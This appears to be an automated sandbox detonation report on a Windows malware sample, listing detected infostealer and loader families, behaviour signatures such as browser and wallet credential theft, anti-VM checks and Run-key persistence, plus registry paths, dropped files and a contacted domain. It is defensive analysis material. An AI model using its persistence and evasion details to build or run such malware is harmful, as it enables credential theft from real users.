Analysis Overview
SHA256
1ed4a8b4c74aab435ea5cd459d5ac961e5a8ca28924801bd84d336135f30efde
Threat Level: Known bad
The file 1ed4a8b4c74aab435ea5cd459d5ac961e5a8ca28924801bd84d336135f30efde was found to be: Known bad.
Malicious Activity Summary
ZharkBot
RedLine payload
Amadey
Suspicious use of NtCreateUserProcessOtherParentProcess
RedLine
CryptBot
Detects ZharkBot payload
Stealc
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Credentials from Password Stores: Credentials from Web Browsers
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Reads user/profile data of web browsers
Loads dropped DLL
Identifies Wine through registry keys
Checks BIOS information in registry
Drops startup file
Reads data files stored by FTP clients
Executes dropped EXE
Checks computer location settings
Indirect Command Execution
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Drops Chrome extension
Drops desktop.ini file(s)
Adds Run key to start application
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in System32 directory
Enumerates processes with tasklist
Drops file in Program Files directory
Drops file in Windows directory
Program crash
Unsigned PE
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Scheduled Task/Job: Scheduled Task
Suspicious use of WriteProcessMemory
Modifies system certificate store
Suspicious use of SendNotifyMessage
Checks processor information in registry
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Checks SCSI registry key(s)
Enumerates system info in registry
Modifies data under HKEY_USERS
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-09-08 02:36
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-08 02:36
Reported
2024-09-08 02:39
Platform
win10v2004-20240802-en
Max time kernel
96s
Max time network
106s
Command Line
Signatures
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\1ed4a8b4c74aab435ea5cd459d5ac961e5a8ca28924801bd84d336135f30efde = "\"C:\\Users\\Admin\\Pictures\\Opportunistic Telegraph\\1ed4a8b4c74aab435ea5cd459d5ac961e5a8ca28924801bd84d336135f30efde.exe\" /update" | C:\Users\Admin\AppData\Local\Temp\1ed4a8b4c74aab435ea5cd459d5ac961e5a8ca28924801bd84d336135f30efde.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1ed4a8b4c74aab435ea5cd459d5ac961e5a8ca28924801bd84d336135f30efde.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1ed4a8b4c74aab435ea5cd459d5ac961e5a8ca28924801bd84d336135f30efde.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1ed4a8b4c74aab435ea5cd459d5ac961e5a8ca28924801bd84d336135f30efde.exe
"C:\Users\Admin\AppData\Local\Temp\1ed4a8b4c74aab435ea5cd459d5ac961e5a8ca28924801bd84d336135f30efde.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | conditionprovice.pro | udp |
| FI | 81.19.139.138:443 | conditionprovice.pro | tcp |
| US | 8.8.8.8:53 | 138.139.19.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
Files
memory/2444-0-0x000000007523E000-0x000000007523F000-memory.dmp
memory/2444-1-0x0000000000FB0000-0x0000000001028000-memory.dmp
memory/2444-2-0x0000000006060000-0x0000000006604000-memory.dmp
memory/2444-3-0x0000000005A00000-0x0000000005A92000-memory.dmp
memory/2444-4-0x0000000075230000-0x00000000759E0000-memory.dmp
memory/2444-5-0x0000000005AD0000-0x0000000005ADA000-memory.dmp
memory/2444-6-0x0000000005BF0000-0x0000000005C0A000-memory.dmp
memory/2444-7-0x000000007523E000-0x000000007523F000-memory.dmp
memory/2444-8-0x0000000075230000-0x00000000759E0000-memory.dmp
memory/2444-10-0x0000000075230000-0x00000000759E0000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-09-08 02:36
Reported
2024-09-08 02:39
Platform
win11-20240802-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Amadey
CryptBot
Detects ZharkBot payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Stealc
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 5564 created 3312 | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | C:\Windows\Explorer.EXE |
| PID 5564 created 3312 | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | C:\Windows\Explorer.EXE |
ZharkBot
Credentials from Password Stores: Credentials from Web Browsers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1000223001\5133bb271c.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS1112.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000223001\5133bb271c.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000223001\5133bb271c.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1000223001\5133bb271c.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Indirect Command Execution
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\service123.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\service123.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\service123.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\service123.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Subsystem Framework = "\"C:\\ProgramData\\Microsoft Subsystem Framework\\winmsbt.exe\"" | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\1ed4a8b4c74aab435ea5cd459d5ac961e5a8ca28924801bd84d336135f30efde = "\"C:\\Users\\Admin\\Pictures\\Opportunistic Telegraph\\1ed4a8b4c74aab435ea5cd459d5ac961e5a8ca28924801bd84d336135f30efde.exe\" /update" | C:\Users\Admin\AppData\Local\Temp\1ed4a8b4c74aab435ea5cd459d5ac961e5a8ca28924801bd84d336135f30efde.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\acentric = "\"C:\\Users\\Admin\\Pictures\\Opportunistic Telegraph\\acentric.exe\" /update" | C:\Users\Admin\AppData\Local\Temp\1000305001\acentric.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\acentric = "\"C:\\Users\\Admin\\Pictures\\Opportunistic Telegraph\\acentric.exe\" /update" | C:\Users\Admin\AppData\Local\Temp\1000269001\acentric.exe | N/A |
Checks installed software on the system
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Users\Admin\AppData\Local\Temp\7zS1112.tmp\Install.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\54E176903A096E58E807B60E1BDFA85C | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_5F8ABD199E1CF2EB9B30F8FD50D3DB0D | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\54E176903A096E58E807B60E1BDFA85C | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_2E1554F9937BF8D3743D83D919742174 | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_2E1554F9937BF8D3743D83D919742174 | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_5F8ABD199E1CF2EB9B30F8FD50D3DB0D | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_2F09F384AB04F931E2EF39FD04145E2F | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zS1112.tmp\Install.exe | N/A |
